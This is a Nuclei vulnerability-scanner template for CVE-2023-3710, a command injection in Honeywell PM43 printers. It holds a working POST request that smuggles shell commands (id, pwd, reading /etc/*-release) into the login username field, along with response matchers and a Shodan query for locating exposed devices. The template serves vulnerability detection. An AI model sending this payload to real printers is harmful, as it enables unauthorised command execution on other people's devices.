nuclei-templates/http/cves/2023/CVE-2023-3710.yaml

51 lines
1.5 KiB
YAML
Raw Normal View History

id: CVE-2023-3710
info:
name: Honeywell PM43 Printers - Command Injection
author: win3zz
2023-10-16 05:10:56 +00:00
severity: critical
description: |
2023-10-16 05:10:56 +00:00
Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006)
reference:
2023-10-16 05:10:56 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-3710
- https://github.com/vpxuser/CVE-2023-3710-POC
2023-10-16 05:10:56 +00:00
- https://twitter.com/win3zz/status/1713451282344853634
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-3710
cwe-id: CWE-20,CWE-77
epss-score: 0.00084
epss-percentile: 0.34979
cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:*
metadata:
2023-10-16 05:10:56 +00:00
max-request: 1
2023-10-16 10:50:20 +00:00
verified: true
shodan-query: http.html:"/main/login.lua?pageid="
2023-10-16 05:10:56 +00:00
tags: cve,cve2023,honeywell,pm43,printer,iot,rce
http:
2023-10-16 10:50:20 +00:00
- raw:
- |
POST /loadfile.lp?pageid=Configure HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=x%0aid;pwd;cat+/etc/*-release%0a&userpassword=1
2023-10-16 05:10:56 +00:00
matchers-condition: and
matchers:
2023-10-16 05:10:56 +00:00
- type: regex
part: body
regex:
- 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)'
- type: word
2023-10-16 05:10:56 +00:00
part: body
words:
2023-10-16 05:10:56 +00:00
- 'Release date'
- type: status
status:
- 200